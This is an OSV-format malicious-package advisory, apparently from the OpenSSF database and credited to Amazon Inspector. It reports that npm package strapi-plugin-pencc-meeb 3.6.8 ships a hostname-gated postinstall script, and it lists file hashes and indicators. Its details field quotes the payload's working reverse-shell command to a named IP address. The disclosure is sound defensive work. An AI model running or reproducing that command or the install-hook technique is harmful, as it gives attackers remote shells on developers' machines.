{"id":"MAL-2026-16210","summary":"Malicious code in strapi-plugin-pencc-meeb (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3b4277c223cb7d5a9b8c263570a18670ee5054779862fbb801024a55629aa208)\npostinstall.js is registered as the package's postinstall script and runs automatically on npm install. It compares os.hostname() to the hardcoded string 'ubuntu-fc-uvm' and, on a match, executes `bash -c \"bash -i \u003e& /dev/tcp/14.225.210.85/80 0\u003e&1\"` via child_process, opening an interactive reverse shell to 14.225.210.85 on TCP port 80. The script includes retry logic and writes to /tmp/postinstall-revshell.log. The hostname gate suppresses activity on non-matching hosts, but the payload is shipped in every install of this version.\n","modified":"2026-09-16T06:45:06.625545874Z","published":"2026-09-16T06:29:25Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["3.6.8"],"id":"IN-MAL-2026-020078","import_time":"2026-09-16T06:31:14.766556516Z","modified_time":"2026-09-16T06:29:25Z","sha256":"3b4277c223cb7d5a9b8c263570a18670ee5054779862fbb801024a55629aa208"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/strapi-plugin-pencc-meeb/v/3.6.8"}],"affected":[{"package":{"name":"strapi-plugin-pencc-meeb","ecosystem":"npm","purl":"pkg:npm/strapi-plugin-pencc-meeb"},"versions":["3.6.8"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"59958a5b6cf205abf8e3c05e62d883c008dafcd91abe907dda3d0f2bdb95a5a2","tlsh":"ef411eed05bf2b3962338ce9522b8097d52741023516d278b5dc8b43bfc4d9ac631afa","path":"postinstall.js"}],"package_integrity":[{"filename":"strapi-plugin-pencc-meeb-3.6.8.tgz","hashes":{"sha1":"9053e329b3b19eaf664334186b54294f518f5494","sha512_sri":"sha512-TcRaK6QGbWYnkJfPhmjfXvmsMvn//4z/tPPyQuWOe+ZD7jNMBmpI+boMMbAj8lIkvYZekDRLx7KBi4voOwMaQA=="}}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strapi-plugin-pencc-meeb/MAL-2026-16210.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}